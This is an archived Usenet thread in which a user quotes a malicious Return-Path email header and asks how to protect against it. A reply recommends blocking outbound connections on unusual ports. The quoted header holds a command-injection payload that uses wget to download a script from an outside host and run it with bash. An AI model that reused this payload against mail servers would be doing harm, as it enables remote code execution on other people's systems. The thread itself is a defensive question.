Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss
Return-Path code execution exploit?
11 views
Skip to first unread message
Solbu
May 6, 2013, 11:10:23 AM5/6/13
to
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I just saw a user pasting what he think was an interesting Return-Path
header. It contains code and not a return address, that could be executed
if the recepient address does not exist.
The header line in question is this one: (sorry for the loong line)
===
Return-path: <no`wget${IFS}-O${IFS}/tmp/ul2sfwxaq7${IFS}booty4u.mobi/bla``bash${IFS}/tmp/ul2sfwxaq7`bo...@bitmynt.no>
===
He also says that there is no From:, body is "test", the rest is minmal.
Is there anything one can do to protect oneself from such attacks?
I tried google, but I get no usefull results.
- --
Solbu - http://www.solbu.net
PGP key ID: 0xFA687324
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFRh8ffT1rWTfpocyQRAkpnAKC0++/S77RNhjFWPqto6MU1EeKz4wCfYxQR
XB+pENK0jGm7tzxNmZOd9rk=
=sPbE
-----END PGP SIGNATURE-----
Hash: SHA1
I just saw a user pasting what he think was an interesting Return-Path
header. It contains code and not a return address, that could be executed
if the recepient address does not exist.
The header line in question is this one: (sorry for the loong line)
===
Return-path: <no`wget${IFS}-O${IFS}/tmp/ul2sfwxaq7${IFS}booty4u.mobi/bla``bash${IFS}/tmp/ul2sfwxaq7`bo...@bitmynt.no>
===
He also says that there is no From:, body is "test", the rest is minmal.
Is there anything one can do to protect oneself from such attacks?
I tried google, but I get no usefull results.
- --
Solbu - http://www.solbu.net
PGP key ID: 0xFA687324
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFRh8ffT1rWTfpocyQRAkpnAKC0++/S77RNhjFWPqto6MU1EeKz4wCfYxQR
XB+pENK0jGm7tzxNmZOd9rk=
=sPbE
-----END PGP SIGNATURE-----
pio...@gmail.com
May 6, 2013, 8:09:19 PM5/6/13
to
On Monday, May 6, 2013 5:10:23 PM UTC+2, Solbu wrote:
> Is there anything one can do to protect oneself from such attacks?
Add rules to your firewall to allow outgoing connections only on valid ports. This one is trying to use port 60002. I do not know about any legitimate service using this port so it can be safe blocked on outgoing connections.
> Is there anything one can do to protect oneself from such attacks?
0 new messages